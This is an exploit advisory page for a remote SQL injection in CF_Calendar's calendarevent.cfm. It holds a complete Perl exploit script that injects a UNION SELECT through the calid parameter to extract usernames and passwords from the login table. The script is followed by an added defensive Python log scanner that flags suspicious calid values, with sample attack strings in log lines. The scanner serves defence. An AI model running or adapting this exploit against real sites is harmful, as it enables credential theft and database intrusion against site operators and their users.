CF_Calendar (calendarevent.cfm) Remote SQL Injection Exploit

2009-03-02 / 2009-03-03
Credit: AlpHaNiX
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl
use HTTP::Request;
use LWP::UserAgent;

print "\n ********************************************\n";
print " * CF_Calendar Remote SQL Injection Exploit *\n";
print " * By AlpHaNiX *\n";
print " ********************************************\n";
print " ********************************************\n";
print " * usage : perl exploit.pl target *\n";
print " * contact : AlpHa[AT]HACKER[DOT]BZ *\n";
print " ********************************************\n";

$alpha1 = "calendarevent.cfm?calid=";
$alpha2 = "0+union+select+1,concat(0x20616c7068616e69787761736865726520,username,0x20616e642070617373776f7264206973203a20,password,0x20616c7068616e69787761736865726520),3,4,null,6,7,8,9+from+login";

if ($ARGV[0] =~ /http:\/\// ) {
    $target = $ARGV[0]."/";
} else {
    $target = "http://".$ARGV[0]."/";
}

print " Working on it\n\n";

my $alpha3 = $target.$alpha1.$alpha2;
my $request = HTTP::Request->new(GET=>$alpha3);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response = $useragent->request($request);

if ($response->is_success) {
    my $res = $response->content;
    if ($res =~ m/ alphanixwashere (.*)and password is : (.*) alphanixwashere /g) {
        my ($username,$passwd) = ($1,$2);
        print "Username : $username \n\n password : $passwd \n\n"
    } else {
        print " operation failed \n\n";
    }
} else {
    print " Error, ".$response->status_line."\n\n";
}
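For defenders, an added example that is not part of the original advisory: the exploit injects through the calid parameter of calendarevent.cfm, so an allow-list check over web access logs flags this payload and any other non-numeric calid value. It assumes calid is an integer id (as the unquoted payload suggests) and a combined-format access log; the sample lines and the function name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [02/Mar/2009:10:01:12 +0000] "GET /calendarevent.cfm?calid=12 HTTP/1.1" 200 5120
198.51.100.9 - - [02/Mar/2009:10:02:40 +0000] "GET /calendarevent.cfm?calid=0+union+select+1,concat(username,password),3+from+login HTTP/1.1" 200 6011
198.51.100.9 - - [02/Mar/2009:10:02:55 +0000] "GET /CalendarEvent.cfm?CALID=0%20UNION%20SELECT%201 HTTP/1.1" 200 6011
203.0.113.4 - - [02/Mar/2009:10:03:01 +0000] "GET /calendarevent.cfm?calid=7%27 HTTP/1.1" 500 312
203.0.113.5 - - [02/Mar/2009:10:04:10 +0000] "GET /index.cfm?calid=abc HTTP/1.1" 200 900
"""

# client address, request target and status code from one log line
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE)


def suspicious_calid_requests(log_text):
    """Return (client, status, kind, decoded_value) for every request to
    calendarevent.cfm whose calid parameter is not a plain integer."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target, status = match.groups()
        url = urlsplit(target)
        # ColdFusion template and URL-scope names are case-insensitive.
        if not url.path.lower().endswith("/calendarevent.cfm"):
            continue
        # parse_qsl decodes %xx and turns '+' into a space.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key.lower() != "calid" or re.fullmatch(r"[0-9]+", value):
                continue
            kind = "union-select" if UNION_RE.search(value) else "non-numeric"
            findings.append((client, int(status), kind, value))
    return findings


if __name__ == "__main__":
    for finding in suspicious_calid_requests(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule belongs in the application: validate calid as an integer and bind it as a typed query parameter rather than concatenating it into the SQL string.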



Copyright 2020, cxsecurity.com